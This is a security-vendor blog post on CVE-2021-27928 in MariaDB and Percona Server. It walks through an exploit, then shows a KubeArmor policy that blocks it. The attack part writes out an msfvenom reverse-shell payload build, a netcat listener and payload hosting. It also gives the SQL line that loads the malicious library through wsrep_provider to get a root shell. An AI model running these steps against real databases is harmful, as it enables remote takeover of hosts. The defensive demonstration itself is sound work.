Defend Zero Day Attacks

Garner holistic visibility across development and deployment life cycle. Mitigate risks proactively to foil attacks with our most advanced and sophisticated CNAPP product.

Open Source

cspm

Tailor made to secure SaaS and private cloud environments

cwpp

Observability & Enforcement for K8s, VMs, Container workloads

Code to Cloud Security

Comprehensive security from development to deployment

AccuKnox is the first 5G Security-ORAN to be published on Nephio

From fortifying the control plane to addressing vulnerabilities in the data plane, read the white paper and discover the crucial steps we need to take in order to enhance the security of 5G networks.

Cloud Native Security Redefined

Accelerate your cloud journey with our battle-tested expertise, delivering a comprehensive zero trust framework that safeguards cloud infrastructure and applications from targeted attacks.

Open Source

KubeArmor is now certified Redhat Openshift Operator

Embracing the Power of Open Source: We are proud to contribute to the open-source community, allowing businesses to leverage the strength of KubeArmor to safeguard their containerized environments.

Protecting Percona DB Server from CVE-2021-27928 – Accuknox

by | Feb 1, 2022

Reading Time: 3 minutes

Introduction

Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.

Every database has different threats, so we will see an insider threat where a malicious user can exploit remote code execution in Percona PMM Server. We will first learn about the vulnerability and walk through the exploit itself to see how we can protect it against.

Vulnerability Assessment

So, let us understand the vulnerability. Remote code execution is the core issue here. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. To run this exploit, you can install any of the following versions below.

Prerequisites:

  1. MariaDB 10.2 before 10.2.37,
    Or 10.3 before 10.3.28,
    Or 10.4 before 10.4.18,
    Or 10.5 before 10.5.9
  2. Percona Server through 2021-03-03

The specific version has already been installed in our test-machine, as you can see below. root@kali will be our victim machine.

root@kali:~# mysql -V mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper

Percona server

The Exploit?

We will connect to another machine and then will start with the exploitation. host@h will be the attacker’s machine.

Step 1:

Let’s create our reverse shell payload with msfvenom. For our payload we will use /Linux/x64/shell_reverse_tcp.

[NOTE] Change LHOST to your IP address.

host@h:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so

LHOST

Step 2:

Now we will use Netcat to listen to the specified port.

host@h:~# nc -lvp -8181 listening on [any] 8181 ..

 Netcat

Step 3:

We will copy the payload to the victim machine. Here we will be using the python HTTP server.

host@h:~# python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)…

python HTTP server

Now let us check our listener we successfully obtained root shell access.

Step 4:

Now let us get into the victim machine and download the payload. To do that just follow the commands below.

Command

Step 5:

We will now execute the payload.

root@kali:~# mysql -u root -p -h 127.0.0.1 -e ‘SET GLOBAL wsrep_provider=”/tmp/CVE-2021-27928.so”;’ Enter password: ERROR 2013 (HY000) at line

  Payload

Now let us check our listener we successfully obtained root shell access.

 

Root shell
 MYSQL 

Let us see how we can protect it using the KubeArmor security policy.

How to use KubeArmor on your VM

Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various different workloads, curated by Security Experts. Check out the following link to view our other Policy Templates.

Kubearmor policy

We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy just copy and paste the following command in your terminal.

karmor vm policy add vm-cve-2021-27928.yaml

 VM policy

root@kali:~ # karmor vm policy add vm-cve-2021-27928.yaml Success

 VM policy

Once the policy is applied let us execute the payload and see what happens.

Root shell

It won’t open the dependencies used by wresp_provider and we won’t get the root shell access in the attacker machine and terminate the payload execution.

To check for logs just copy-paste the following command in your terminal.

karmor log –json

Logs

Conclusion

In this blog, we have seen how single unwanted permission in a variable from your DB’s codebase could be abused to gain root access to your system. There are several other exploits too that can be used against when you’re running an outdated version of any database. Hence the solution is to always keep your DB versions updated to the latest patch as soon as it’s released by the vendors.

KubeArmor is a cloud run-time security tool by AccuKnox that makes the job of detecting such vulnerabilities and patching them up easier when the manual updates take time. To learn more about AccuKnox and its products, check out the links below.

KubeArmor website: https://kubearmor.io/

KubeArmor GitHub: https://github.com/kubearmor/KubeArmor

KubeArmor Slack: Join Us

Now you can protect your workloads in minutes using AccuKnox, it is available to protect your Kubernetes and other cloud workloads using Kernel Native Primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.

Please enable JavaScript in your browser to complete this form.
We protect your organization against current and emerging threats with Zero Trust Cloud Security Solutions